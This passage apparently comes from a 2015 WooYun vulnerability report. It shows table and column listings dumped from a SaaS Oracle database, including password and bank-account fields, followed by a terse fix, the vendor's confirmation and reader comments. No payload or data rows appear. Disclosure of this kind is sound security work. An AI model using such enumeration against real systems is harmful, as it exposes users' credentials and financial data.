| WORKFLOWNO | VARCHAR2 |
+----------------------+----------+
Database: SAAS14
Table: USR_MEMBER
[26 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| ACCOUNT | VARCHAR2 |
| ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NO | VARCHAR2 |
| BANK_CITY | VARCHAR2 |
| BANK_NAME | VARCHAR2 |
| BANK_PROVINCE | VARCHAR2 |
| BANK_TYPE | VARCHAR2 |
| BOOK_COUNT | NUMBER |
| DEPOSIT | NUMBER |
| EMAIL | VARCHAR2 |
| IMG | VARCHAR2 |
| LAST_LOGIN | DATE |
| LOGIN_COUNT | NUMBER |
| LOGIN_TYPE | NUMBER |
| MOBILE | VARCHAR2 |
| ORDER_COUNT | NUMBER |
| ORDER_CUST_ID | NUMBER |
| OUT_USER_ID | VARCHAR2 |
| PARENT_CUST_ID | NUMBER |
| PASSWORD | VARCHAR2 |
| REG_DATE | DATE |
| STATUS | NUMBER |
| USER_ID | NUMBER |
| USER_NAME | VARCHAR2 |
| VCODE | VARCHAR2 |
+-------------------+----------+
Database: SAAS14
Table: WX_USER_INFO
[21 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| AREA_ID | NUMBER |
| CITY | VARCHAR2 |
| COUNTRY | VARCHAR2 |
| CREATE_DATE | DATE |
| CUST_ID | NUMBER |
| HEADIMGURL | VARCHAR2 |
| LOGIN_DATE | DATE |
| NICKNAME | VARCHAR2 |
| OPENID | VARCHAR2 |
| ORDER_CUST_ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PROVINCE | VARCHAR2 |
| SEX | NUMBER |
| SOURCE_ID | NUMBER |
| STATE | NUMBER |
| SUBSCRIBE_TIME | DATE |
| TREE_ID | NUMBER |
| UNSUBSCRIBE_TIME | DATE |
| USER_ID | VARCHAR2 |
| USER_LANGUAGE | VARCHAR2 |
| USER_MEMO | VARCHAR2 |
+------------------+----------+
Database: SAAS14
Table: USR_LOGIN
[32 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| CUST_ID | NUMBER |
| CZ_STARTTIME | DATE |
| CZCODE | VARCHAR2 |
| DEPT_ID | NUMBER |
| DUTY_STATE | NUMBER |
| DYCON | VARCHAR2 |
| DYSHOW | NUMBER |
| EMAIL | VARCHAR2 |
| FAX | VARCHAR2 |
| IS_CZ | NUMBER |
| IS_DISPRICE | NUMBER |
| IS_MANAGER | NUMBER |
| IS_ORDERLIST | NUMBER |
| IS_PAY | NUMBER |
| IS_SHOWSYSTEMMSG | NUMBER |
| IS_VALIDATE | NUMBER |
| LAST_DATE | DATE |
| LAST_IP | VARCHAR2 |
| LOGIN_COUNT | NUMBER |
| LYT_ID | VARCHAR2 |
| MOBILE | VARCHAR2 |
| PARENT_AGENT_ID | NUMBER |
| PASSWORD | VARCHAR2 |
| PHONE | VARCHAR2 |
| PWD | VARCHAR2 |
| ROLE_ID | NUMBER |
| ROLE_TYPE | NUMBER |
| USER_GRADE | NUMBER |
| USER_ID | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_PERMISSION | VARCHAR2 |
| USER_STATE | NUMBER |
+------------------+----------+

漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-09 17:56

厂商回复:

thx

最新状态:

暂无


漏洞评价:

评论

  1. 2015-11-09 23:42 | 雪葬爱 ( 路人 | Rank:18 漏洞数:8 | 小菜,大白菜,愿得一人心,白首不分离。)

    这能不火么

  2. 2015-11-11 15:07 | debue喵 ( 实习白帽子 | Rank:40 漏洞数:8 | 写代码的猫。)

    前排围观